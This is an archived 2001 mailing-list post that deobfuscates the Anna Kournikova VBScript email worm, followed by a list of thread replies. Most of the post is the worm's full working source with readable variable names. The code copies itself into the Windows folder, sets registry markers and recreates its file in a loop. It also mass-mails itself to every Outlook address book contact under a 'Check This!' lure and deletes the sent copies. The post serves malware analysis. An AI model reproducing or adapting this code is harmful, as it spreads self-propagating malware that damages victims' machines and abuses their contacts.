Vulnerability Development mailing list archives
unobfuscation of AnnaKournikova.jpg. vee bee ess worm
From: rpc <h () ckz org>
Date: Mon, 12 Feb 2001 14:42:03 GMT
Hi All, I've heard of several reports of this trojan popping up, but I haven't found much information on it, so I decided to unobfuscate the source and have a look at it. Below is the payload of the worm. Obfuscated variable names have been translated into more meaningful names. -----Begin AnnaKournikova.jpg. v & b & s --------------- 'Vbs.OnTheFly Created By OnTheFly On Error Resume Next Set shellobject = CreateObject("WScript.Shell") shellobject.regwrite "HKCU\software\OnTheFly\", "Worm made with Vbswg 1.50b" Set filesystem= Createobject("scripting.filesystemobject") filesystem.copyfile wscript.scriptfullname,filesystem.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs" if shellobject.regread ("HKCU\software\OnTheFly\mailed") <> "1" then mail_trojan() end if if month(now) =1 and day(now) =26 then shellobject.run "Http://www.dynabyte.nl",3,false end if Set wormfile= filesystem.opentextfile(wscript.scriptfullname, 1) payload= wormfile.readall wormfile.Close Do If Not (filesystem.fileexists(wscript.scriptfullname)) Then Set newfile= filesystem.createtextfile(wscript.scriptfullname, True) newfile.writepayload newfile.Close End If Loop Function mail_trojan() On Error Resume Next Set outlook = CreateObject("Outlook.Application") If outlook= "Outlook"Then Set mapi=outlook.GetNameSpace("MAPI") Set addresses= mapi.AddressLists For Each address In addresses If address.AddressEntries.Count <> 0 Then count = address.AddressEntries.Count For I= 1 To count Set email = outlook.CreateItem(0) Set entry = address.AddressEntries(I) email.To = entry.Address email.Subject = "Here you have, ;o)" email.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & "" set attachment=email.Attachments attachment.Add filesystem.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs" email.DeleteAfterSubmit = True If email.To <> "" Then email.Send shellobject.regwrite "HKCU\software\OnTheFly\mailed", "1" End If Next End If Next end if End Function 'Vbswg 1.50b ---------------------------------------------- hasta, --rpc
Current thread:
- unobfuscation of AnnaKournikova.jpg. vee bee ess worm rpc (Feb 13)
- Re: unobfuscation of AnnaKournikova.jpg. vee bee ess worm Ryan Yagatich (Feb 13)
- Re: unobfuscation of AnnaKournikova.jpg. vee bee ess worm Vladimir Dubrovin (Feb 13)
- Re: unobfuscation of AnnaKournikova.jpg. vee bee ess worm Dzzie Z (Feb 19)